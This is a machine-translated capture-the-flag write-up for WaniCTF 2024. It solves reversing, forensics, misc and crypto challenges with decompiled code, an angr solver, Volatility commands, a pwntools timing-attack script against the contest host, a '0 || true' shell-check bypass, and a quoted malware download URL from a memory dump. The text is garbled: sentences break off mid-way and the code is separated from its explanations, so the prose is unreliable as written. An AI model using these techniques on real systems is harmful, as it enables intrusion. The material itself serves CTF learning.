\n\nThis page has been machine-translated from the original page.
\n
In June 2024, I participated in Wani CTF as part of 0nePadding, and we finished 21st out of 1,493 teams.
\nThere are many nested lambdas here, but you do not need to read them too literally. If you pull out the elements from the top in order, the overall behavior becomes fairly intuitive. Reading it from the top down, we can see that it performs the following operations. By reversing the sequence we can infer from this, we can write the following solver. Running it reveals that I obfuscated the function that processes the FLAG. You probably do not want to read it… right! Decompiling the main function of the challenge binary gives the following result. In this function, it first checks whether the current directory name obtained with The Even without reading the implementation in detail, it seems likely that debugging this function would let us inspect the generated flag. Since the anti-debugging technique used here was only a After setting the breakpoint above and running the program, I could easily recover the generated flag by searching memory for the flag string, as shown below. I put a flag into the gate, and something came out. What is the flag? Decompiling the challenge binary shows that it takes a 32-character input ( After that, this buffer is evaluated and processed in the following function. Here, it seems to apply different operations to the input characters depending on the integer values embedded in the buffer. Eventually, if the data in the buffer matches a hardcoded byte sequence, the input is judged to be the correct flag. By this point, it was clear that this was the kind of problem you can solve with brute-force Running this script takes a little time, but it identifies the correct flag. (This might not have been the intended solution…) I unusually got the flag very smoothly, and since I was happy to solve it third, I took a commemorative screenshot. That’s all. A certain PC has been behaving suspiciously, as if someone malicious were operating it. It seems someone managed to retrieve some kind of cache file from that PC, so please investigate it! The challenge file was an RDP screen bitmap cache file. After merging the images with Reference: ANSSI-FR/bmc-tools: RDP Bitmap Cache parser I, the codebreaker, have broken the QR code! A broken QR code is provided. I vaguely remembered that if even part of the corner markers remained, a QR code reader could still read the link. But here the × marks had wiped out all of those blocks, so it could not be read as-is. However, when I tried shifting the image with Aozora ShiroNeko, I was able to restore it to a readable state as shown below. Reading this QR code gives the flag As an alternative solution, it seems there is a way to reconstruct the QR code itself. That approach looks pretty hard, but maybe that was the intended solution… Reference: public-writeup/mma2015/misc400-qr/writeup.md at master · pwning/public-writeup I found an unknown file and opened it, and it behaved strangely, so I captured a memory dump! How was the attack carried out? The memory dump is large, so it is distributed at the URL below (it becomes 2 GB after extraction). It may become unavailable after WaniCTF ends. https://drive.google.com/file/d/1sxnYz-bp-E9Bj9usN8lRoL4OE8AxrCRu/view?usp=sharing Note: There are two flags in the file. The flag starting with Since it was a full Windows memory dump, I first checked the information with Enumerating running processes was not very useful. When I extracted So, by decoding that, we were able to recover the complete flag. Also, for some reason, when I extracted To extract the video from there, I used the following Reference: volvet/h264extractor: wireshark plugin to extract h264 or opus stream from rtp packets Reference: Initial setup for using Lua scripts in Wireshark #Wireshark - Qiita In the current version of Wireshark, it seems that you can use the plugin just by placing its Lua file in the Using this plugin, I extracted the H264 file, converted it to mp4, and played the video to get the flag. However, I could not find any image where the height and width landed in just the right place. So I decided to crop out the parts of the generated images that looked like the flag characters and stitch them together. So I thought about how to bypass the following check. In the As another solution, it seems possible to bypass the validation by exploiting This option is used as follows. Reference: How To Use set and pipefail in Bash Scripts on Linux To bypass this, we can use a technique based on If commands are chained with Reference: What’s the meaning of the operator || in linux shell? - Stack Overflow In other words, if you give input like This lets us bypass the Furthermore, with With cheats, anything is possible. The challenge binary was as follows. Looking at the code, we can see that to get the flag we either have to guess a random 10-digit number within 100 tries, or enter a cheat code that was probably randomly generated. As for the cheat code, the program prints its hash when it runs, but because it seems to use stretching an unspecified number of times and the cheat code itself also appears to be randomly generated, it was difficult to determine. However, the key point here is that in In Python, for expressions joined with Therefore, when As a result, when In the end, I got the flag with the following code. AES is one of the most important encryption methods in our daily lives. This one was just a straightforward brute-force solve. Overall, I thought the difficulty was fairly high, but there were a lot of interesting and educational challenges, especially in misc, so I had fun.input\n'Enter the flag: '\n''.join\n(chr(ord(c) + 12) for c in _9)\n''.join\n(chr(ord(c) - 3) for c in _10(_5))\n''.join\n(chr(123 ^ ord(c)) for c in _20)\n''.join\n(_21(c) for c in _16)\n_28('16_10_13_x_6t_4_1o_9_1j_7_9_1j_1o_3_6_c_1o_6r')\n''.join\n(chr(int(c,36) + 10) for c in _29.split('_'))\n_38: _37 == _38\n_40(print)\n_52('Correct FLAG!')\n_54('Incorrect')\n
\n16_10_13_x_6t_4_1o_9_1j_7_9_1j_1o_3_6_c_1o_6r to integersCorrect FLAG! or Incorrectdef decode_and_verify_flag():\n encoded_string = \"16_10_13_x_6t_4_1o_9_1j_7_9_1j_1o_3_6_c_1o_6r\"\n decoded_step1 = ''.join(chr(int(c, 36) + 10) for c in encoded_string.split('_'))\n decoded_step2 = ''.join(chr(123 ^ ord(c)) for c in decoded_step1)\n decoded_step3 = ''.join(chr(ord(c) + 3) for c in decoded_step2)\n decoded_step4 = ''.join(chr(ord(c) - 12) for c in decoded_step3)\n print(decoded_step4)\n\ndecode_and_verify_flag()FLAG{l4_1a_14mbd4} is the correct flag.home(Rev)
\n\n
\nint32_t main(int32_t argc, char** argv, char** envp)\n{\n void* fsbase;\n int64_t rax = *(uint64_t*)((char*)fsbase + 0x28);\n void buf;\n int32_t rax_5;\n if (getcwd(&buf, 0x400) == 0)\n {\n perror(\"Error\");\n rax_5 = 1;\n }\n else\n {\n char* rax_2 = strstr(&buf, \"Service\");\n int64_t rax_4;\n if (rax_2 == 0)\n {\n puts(&data_20ff);\n }\n else\n {\n puts(\"Check passed!\");\n rax_4 = ptrace(PTRACE_TRACEME, 0, 0, 0);\n if (rax_4 != -1)\n {\n constructFlag();\n }\n }\n if ((rax_2 == 0 || (rax_2 != 0 && rax_4 != -1)))\n {\n rax_5 = 0;\n }\n if ((rax_2 != 0 && rax_4 == -1))\n {\n puts(\"Debugger detected!\");\n rax_5 = 1;\n }\n }\n if (rax == *(uint64_t*)((char*)fsbase + 0x28))\n {\n return rax_5;\n }\n __stack_chk_fail();\n /* no return */\n}getcwd is Service, and if it can attach to itself with ptrace, it executes constructFlag.constructFlag function seems to perform a very complex process related to generating the flag.int64_t constructFlag()\n{\n int64_t r15;\n int64_t var_10 = r15;\n int64_t r14;\n int64_t var_18 = r14;\n int64_t r13;\n int64_t var_20 = r13;\n int64_t r12;\n int64_t var_28 = r12;\n int64_t rbx;\n int64_t var_30 = rbx;\n void var_118;\n int32_t rdx;\n uint64_t rdi_1;\n uint32_t r9;\n int32_t r10;\n rdx = memcpy(&var_118, &data_2010, 0xb0);\n int32_t var_11c = 0;\n int32_t var_128 = 0x7c46699a;\n while (true)\n {\n int32_t var_130_1 = (var_128 - 0xa2245c7a);\n int32_t var_124;\n bool r11_1;\n if (var_128 == 0xa2245c7a)\n {\n int32_t rax_61 = 0x60b926fc;\n var_124 = (var_124 + 1);\n uint32_t x_5 = x;\n r9 = ((x_5 * (x_5 - 1)) & 1) == 0;\n r10 = y < 0xa;\n r11_1 = (r9 & r10);\n r9 = (r9 ^ r10);\n if (((r11_1 | r9) & 1) != 0)\n {\n rax_61 = -0x51fc1498;\n }\n var_128 = rax_61;\n }\n else\n {\n int32_t var_134_1 = (var_128 - 0xae03eb68);\n if (var_128 == 0xae03eb68)\n {\n var_128 = 0x19056f3d;\n }\n else\n {\n int32_t var_138_1 = (var_128 - 0xbb1ffe21);\n char var_31;\n if (var_128 == 0xbb1ffe21)\n {\n int32_t rax_52 = 0x54525dca;\n rdx = var_31;\n if ((rdx & 1) != 0)\n {\n rax_52 = -0x1c311557;\n }\n var_128 = rax_52;\n }\n else\n {\n int32_t var_13c_1 = (var_128 - 0xcb295bc0);\n if (var_128 == 0xcb295bc0)\n {\n int32_t rax_58 = 0x58d9f831;\n rdx = 1;\n uint32_t x_3 = x;\n r9 = ((x_3 * (x_3 - 1)) & 1) == 0;\n r10 = y < 0xa;\n r11_1 = (r9 ^ 0xff);\n rbx = r10;\n rbx = (rbx ^ 0xff);\n rdx = 0;\n r14 = r11_1;\n r14 = (r14 & 0xff);\n r9 = 0;\n r15 = rbx;\n r15 = (r15 & 0xff);\n r10 = 0;\n r14 = (r14 | 0);\n r15 = (r15 | 0);\n r14 = (r14 ^ r15);\n rdx = 1;\n r14 = (r14 | (((r11_1 | rbx) ^ 0xff) & 1));\n if ((r14 & 1) != 0)\n {\n rax_58 = -0x1d900a39;\n }\n var_128 = rax_58;\n }\n else\n {\n int32_t var_140_1 = (var_128 - 0xd2cc8233);\n int32_t var_120;\n if (var_128 == 0xd2cc8233)\n {\n var_120 = (var_120 + 1);\n var_128 = 0x694bd910;\n }\n else\n {\n int32_t var_144_1 = (var_128 - 0xdb9d01fc);\n if (var_128 == 0xdb9d01fc)\n {\n var_128 = 0xdd0621c0;\n }\n else\n {\n int32_t var_148_1 = (var_128 - 0xdd0621c0);\n if (var_128 == 0xdd0621c0)\n {\n int32_t rax_60 = 0x60b926fc;\n rdx = 1;\n uint32_t x_4 = x;\n r9 = ((x_4 * (x_4 - 1)) & 1) == 0;\n r10 = y < 0xa;\n r11_1 = (r9 ^ 0xff);\n rbx = r10;\n rbx = (rbx ^ 0xff);\n rdx = 0;\n r14 = r11_1;\n r14 = (r14 & 0xff);\n r9 = 0;\n r15 = rbx;\n r15 = (r15 & 0xff);\n r10 = 0;\n r14 = (r14 | 0);\n r15 = (r15 | 0);\n r14 = (r14 ^ r15);\n rdx = 1;\n r14 = (r14 | (((r11_1 | rbx) ^ 0xff) & 1));\n if ((r14 & 1) != 0)\n {\n rax_60 = -0x5ddba386;\n }\n var_128 = rax_60;\n }\n else\n {\n int32_t var_14c_1 = (var_128 - 0xde3c30d3);\n if (var_128 == 0xde3c30d3)\n {\n int32_t rax_51 = 0x34e86ff4;\n rdx = var_120 < 0x2c;\n rdx = (rdx & 1);\n var_31 = rdx;\n uint32_t x_2 = x;\n rdx = ((x_2 * (x_2 - 1)) & 1) == 0;\n r9 = y < 0xa;\n r10 = rdx;\n r10 = (r10 & r9);\n rdx = (rdx ^ r9);\n r10 = (r10 | rdx);\n if ((r10 & 1) != 0)\n {\n rax_51 = -0x44e001df;\n }\n var_128 = rax_51;\n }\n else\n {\n int32_t var_150_1 = (var_128 - 0xe26ff5c7);\n void var_68;\n if (var_128 == 0xe26ff5c7)\n {\n int32_t rax_59 = 0x58d9f831;\n rdx = 1;\n *(uint8_t*)(&var_68 + ((int64_t)var_124)) = (((int8_t)*(uint32_t*)(&var_118 + (((int64_t)var_124) << 2))) + (0 - var_124));\n uint32_t x_6 = x;\n r11_1 = ((x_6 * (x_6 - 1)) & 1) == 0;\n rbx = y < 0xa;\n r14 = r11_1;\n r14 = (r14 ^ 0xff);\n r15 = rbx;\n r15 = (r15 ^ 0xff);\n rdx = 1;\n r12 = r14;\n r12 = 0;\n r13 = r15;\n r13 = 0;\n rbx = (rbx & 1);\n r12 = (0 | (r11_1 & 1));\n r13 = (0 | rbx);\n r12 = (r12 ^ r13);\n r14 = (r14 | r15);\n r14 = (r14 ^ 0xff);\n rdx = 1;\n r14 = (r14 & 1);\n r12 = (r12 | r14);\n if ((r12 & 1) != 0)\n {\n rax_59 = -0x2462fe04;\n }\n var_128 = rax_59;\n }\n else\n {\n int32_t var_154_1 = (var_128 - 0xe3ceeaa9);\n if (var_128 == 0xe3ceeaa9)\n {\n int32_t rdx_3 = *(uint32_t*)(&var_118 + (((int64_t)var_120) << 2));\n *(uint32_t*)(&var_118 + (((int64_t)var_120) << 2)) = (((rdx_3 ^ 0xffffffff) & 0x19f) | (rdx_3 & 0xfffffe60));\n var_128 = 0xd2cc8233;\n }\n else\n {\n int32_t var_158_1 = (var_128 - 0x19341ee);\n if (var_128 == 0x19341ee)\n {\n break;\n }\n int32_t var_15c_1 = (var_128 - 0x19056f3d);\n if (var_128 == 0x19056f3d)\n {\n int32_t rax_57 = 0x19341ee;\n if (var_124 < 0x2c)\n {\n rax_57 = -0x34d6a440;\n }\n var_128 = rax_57;\n }\n else\n {\n int32_t var_160_1 = (var_128 - 0x25d256eb);\n if (var_128 == 0x25d256eb)\n {\n int32_t var_184_1 = 2;\n int32_t temp15_1;\n int32_t temp16_1;\n temp15_1 = HIGHD(((int64_t)*(uint32_t*)(&var_118 + (((int64_t)var_11c) << 2))));\n temp16_1 = LOWD(((int64_t)*(uint32_t*)(&var_118 + (((int64_t)var_11c) << 2))));\n *(uint32_t*)(&var_118 + (((int64_t)var_11c) << 2)) = (COMBINE(temp15_1, temp16_1) / 2);\n var_128 = 0x299ff63b;\n }\n else\n {\n int32_t var_164_1 = (var_128 - 0x299ff63b);\n if (var_128 == 0x299ff63b)\n {\n var_11c = (var_11c + 1);\n var_128 = 0x7c46699a;\n }\n else\n {\n int32_t var_168_1 = (var_128 - 0x33ee2572);\n if (var_128 == 0x33ee2572)\n {\n var_120 = 0;\n var_128 = 0x694bd910;\n }\n else\n {\n int32_t var_16c_1 = (var_128 - 0x34e86ff4);\n if (var_128 == 0x34e86ff4)\n {\n var_128 = 0xde3c30d3;\n }\n else\n {\n int32_t var_170_1 = (var_128 - 0x54525dca);\n if (var_128 == 0x54525dca)\n {\n var_124 = 0;\n var_128 = 0x19056f3d;\n }\n else\n {\n int32_t var_174_1 = (var_128 - 0x58d9f831);\n if (var_128 == 0x58d9f831)\n {\n rdi_1 = (*(uint32_t*)(&var_118 + (((int64_t)var_124) << 2)) + (0 - var_124));\n *(uint8_t*)(&var_68 + ((int64_t)var_124)) = rdi_1;\n var_128 = 0xe26ff5c7;\n }\n else\n {\n int32_t var_178_1 = (var_128 - 0x60b926fc);\n if (var_128 == 0x60b926fc)\n {\n var_124 = (var_124 + 1);\n var_128 = 0xa2245c7a;\n }\n else\n {\n int32_t var_17c_1 = (var_128 - 0x694bd910);\n if (var_128 == 0x694bd910)\n {\n int32_t rax_50 = 0x34e86ff4;\n uint32_t x_1 = x;\n r9 = ((x_1 * (x_1 - 1)) & 1) == 0;\n r10 = y < 0xa;\n r11_1 = (r9 & r10);\n r9 = (r9 ^ r10);\n if (((r11_1 | r9) & 1) != 0)\n {\n rax_50 = -0x21c3cf2d;\n }\n var_128 = rax_50;\n }\n else\n {\n int32_t var_180_1 = (var_128 - 0x7c46699a);\n if (var_128 == 0x7c46699a)\n {\n int32_t rax_42 = 0x33ee2572;\n if (var_11c < 0x2c)\n {\n rax_42 = 0x25d256eb;\n }\n var_128 = rax_42;\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n }\n int32_t rax_21;\n rax_21 = 0;\n int32_t var_188 = printf(\"Processing completed!\");\n return 0;\n}ptrace attach, I patched that part, then launched the copied program from the Service directory under gdb and debugged it.b *0x5555555558e5gate(Rev)
\n\n
\n0x200//0x10) and stores it in the buffer in the form 1 <input character> every 0x10 bytes.void* sub_1220()\n{\n void* i = &data_4040;\n do\n {\n int32_t rdx_4 = *(uint32_t*)i;\n if (rdx_4 == 3)\n {\n void* rdx_11 = ((((int64_t)*(uint32_t*)((char*)i + 4)) << 4) + &data_4040);\n if (*(uint8_t*)((char*)rdx_11 + 0xc) != 0)\n {\n void* rdi_7 = ((((int64_t)*(uint32_t*)((char*)i + 8)) << 4) + &data_4040);\n if (*(uint8_t*)((char*)rdi_7 + 0xc) != 0)\n {\n char rdx_12 = (*(uint8_t*)((char*)rdx_11 + 0xd) ^ *(uint8_t*)((char*)rdi_7 + 0xd));\n *(uint8_t*)((char*)i + 0xc) = 1;\n *(uint8_t*)((char*)i + 0xd) = rdx_12;\n }\n }\n }\n else\n {\n if ((rdx_4 == 1 || rdx_4 == 2))\n {\n void* rdx_3 = ((((int64_t)*(uint32_t*)((char*)i + 4)) << 4) + &data_4040);\n if (*(uint8_t*)((char*)rdx_3 + 0xc) != 0)\n {\n void* rdi_3 = ((((int64_t)*(uint32_t*)((char*)i + 8)) << 4) + &data_4040);\n if (*(uint8_t*)((char*)rdi_3 + 0xc) != 0)\n {\n char rdi_4 = (*(uint8_t*)((char*)rdi_3 + 0xd) + *(uint8_t*)((char*)rdx_3 + 0xd));\n *(uint8_t*)((char*)i + 0xc) = 1;\n *(uint8_t*)((char*)i + 0xd) = rdi_4;\n }\n }\n }\n if (rdx_4 == 4)\n {\n void* rdx_7 = ((((int64_t)*(uint32_t*)((char*)i + 4)) << 4) + &data_4040);\n if (*(uint8_t*)((char*)rdx_7 + 0xc) != 0)\n {\n char rdx_8 = *(uint8_t*)((char*)rdx_7 + 0xd);\n i = ((char*)i + 0x10);\n *(uint8_t*)((char*)i - 4) = 1;\n *(uint8_t*)((char*)i - 3) = rdx_8;\n if (i == &stdin)\n {\n break;\n }\n continue;\n }\n }\n }\n i = ((char*)i + 0x10);\n } while (i != &stdin);\n return i;\n}angr, so I wrote the following solver.import angr\nimport claripy\n\nproj = angr.Project(\"gates\", auto_load_libs=False)\nobj = proj.loader.main_object\nprint(\"Entry\", hex(obj.entry))\n\nfind = 0x401124\navoids = [0x40110c]\n\nflag = claripy.BVS('flag', 32*8, explicit_name=True)\n\ninit_state = proj.factory.entry_state()\nfor i in range(19):\n init_state.solver.add(flag.get_byte(i) >= 0x21)\n init_state.solver.add(flag.get_byte(i) <= 0x7f)\n\ninit_state = proj.factory.entry_state(stdin=flag)\nsimgr = proj.factory.simgr(init_state)\nsimgr.explore(find=find, avoid=avoids)\n\n# 出力\nsimgr.found[0].posix.dumps(0)\n\n# FLAG{INTr0dUction_70_R3v3R$1NG1}Surveillance of sus(Forensic)
\n\n
\nbmc-tools, I was able to recover the flag FLAG{RDP_is_useful_yipeee}.python3 bmc-tools.py -s Cache_chal.bin -d images -bcodebreaker(Forensic)
\n\n
\nFLAG{How_scan-dalous}.mem search(Forensic)
\n\n
\nFLAG{H is not the answer this time. Please submit the flag starting with FLAG{D.vol3.vol3 -f chal_mem_search.DUMP windows.info.Infovol3 -f chal_mem_search.DUMP windows.psscan.PsScanread_this_as_admin.lnknload, I found that it executes PowerShell-encoded code like the following.http://192.168.0.16:8282/B64_decode_RkxBR3tEYXl1bV90aGlread_this_as_admin.lnknload again with the same command, I was able to obtain the complete .lnk file containing the flag.h264extractor plugin.plugins folder.if statement, it appears to be evaluated based on whether the exit status of the final command, grep -e [^0-9], is 0.if printf $i | grep -e [^0-9]; then\n printf \"bye hacker!\"\n exit 1\nfiset -euo pipefail.# スクリプト内で呼び出されるプロセスの戻り値が 0 以外の場合はすべて失敗とみなし、スクリプトをその時点で終了する\nset -e\n\n# ただし、| で繋がれた場合、$? で参照できるエラーコードは最後のコマンドの実行結果による\n# つまり、<エラーを返すコマンド> | <成功するコマンド> のような処理を行う場合、set -e ではスクリプトは停止しない\n\n# ここで、-o pipefail を付与すると、パイプ内のエラーも -e の判定条件に含めることができる\n# 以下を使用すると、パイプ区切りのコマンドはすべて実行できるが、その中にエラーを返すものがある場合スクリプトは停止する\nset -eo pipefail\n\n# -u は、未定義の変数を参照した際にエラーを返すように設定できる\n# ただし、if 文や :~ などで未定義変数を適切に操作できる場合にはエラーは返されない\nset -euo pipefail||.||, the command on the right is invoked only when the command on the left fails.0 || true, only 0 is sent to standard output.$ printf 0 || true | echo\n0if validation when 0 || true is used as the input value.$r == 1 || true, (presumably) $r == 1 does not become true, so true is executed and the final evaluation result becomes true, allowing us to get the flag.Cheat Code(Misc)
\n\n
\nfrom hashlib import sha256\nimport os\nfrom secrets import randbelow\nfrom secret import flag, cheat_code\nimport re\n\nchallenge_times = 100\nhash_strength = int(os.environ.get(\"HASH_STRENGTH\", 10000))\n\ndef super_strong_hash(s: str) -> bytes:\n sb = s.encode()\n for _ in range(hash_strength):\n sb = sha256(sb).digest()\n return sb\n\ncheat_code_hash = super_strong_hash(cheat_code)\nprint(f\"hash of cheat code: {cheat_code_hash.hex()}\")\nprint(\"If you know the cheat code, you will always be accepted!\")\n\nsecret_number = randbelow(10**10)\nsecret_code = f\"{secret_number:010d}\"\nprint(f\"Find the secret code of 10 digits in {challenge_times} challenges!\")\n\ndef check_code(given_secret_code, given_cheat_code):\n def check_cheat_code(given_cheat_code):\n return super_strong_hash(given_cheat_code) == cheat_code_hash\n\n digit_is_correct = []\n for i in range(10):\n digit_is_correct.append(given_secret_code[i] == secret_code[i] or check_cheat_code(given_cheat_code))\n return all(digit_is_correct)\n\ngiven_cheat_code = input(\"Enter the cheat code: \")\nif len(given_cheat_code) > 50:\n print(\"Too long!\")\n exit(1)\nfor i in range(challenge_times):\n print(f\"=====Challenge {i+1:03d}=====\")\n given_secret_code = input(\"Enter the secret code: \")\n if not re.match(r\"^\\d{10}$\", given_secret_code):\n print(\"Wrong format!\")\n exit(1)\n if check_code(given_secret_code, given_cheat_code):\n print(\"Correct!\")\n print(flag)\n exit(0)\n else:\n print(\"Wrong!\")\nprint(\"Game over!\")digit_is_correct.append(given_secret_code[i] == secret_code[i] or check_cheat_code(given_cheat_code)), the digit comparison and the cheat-code check are joined with or during input validation.or, if the first expression evaluates to true, the later expression is not evaluated.given_secret_code[i] == secret_code[i] is true, check_cheat_code(given_cheat_code) itself is not executed.check_cheat_code(given_cheat_code) performs hashing an enormous number of times.given_secret_code[i] == secret_code[i] is true, execution becomes much faster, making a timing attack easy.from pwn import *\nimport time\n\ntarget = remote(\"chal-lz56g6.wanictf.org\", 5000)\n\ntarget.recvuntil(b\"Enter the cheat code: \")\ntarget.sendline(\"A\"*1)\n\nbase = [\"0\" for i in range(10)]\n\nfor i in range(10):\n words = {}\n print(f\"========== Stage {i} ==========\")\n for j in range(10):\n base[i] = str(j)\n target.recvuntil(b\"Enter the secret code: \")\n payload = \"\".join(base)\n target.sendline(payload.encode())\n start = time.time()\n r = target.recvline()\n end = time.time()\n print(f\"{end-start} seconds\")\n words[payload] = end-start\n if \"Wrong!\" not in r.decode():\n print(r)\n print(target.recvline())\n exit()\n\n m = min(words, key=words.get)\n base[i] = m[i]beginners aes(Crypto)
\n\n
\nfrom Crypto.Util.Padding import unpad\nfrom Crypto.Cipher import AES\nfrom os import urandom\nimport hashlib\n\nkey = b'the_enc_key_is_'\niv = b'my_great_iv_is_'\n\nenc = b'\\x16\\x97,\\xa7\\xfb_\\xf3\\x15.\\x87jKRaF&\"\\xb6\\xc4x\\xf4.K\\xd77j\\xe5MLI_y\\xd96\\xf1$\\xc5\\xa3\\x03\\x990Q^\\xc0\\x17M2\\x18'\nflag_hash = \"6a96111d69e015a07e96dcd141d31e7fc81c4420dbbef75aef5201809093210e\"\n\nfor i in range(256):\n for j in range(256):\n tk = key + i.to_bytes(1,\"little\")\n tiv = iv + j.to_bytes(1,\"little\")\n cipher = AES.new(tk, AES.MODE_CBC, tiv)\n\n try:\n decrypted_msg = unpad(cipher.decrypt(enc), 16)\n print(f'Decrypted message = {decrypted_msg.decode(\"utf-8\")}')\n except:\n pass\n\n# FLAG{7h3_f1r57_5t3p_t0_Crypt0!!}Summary
\n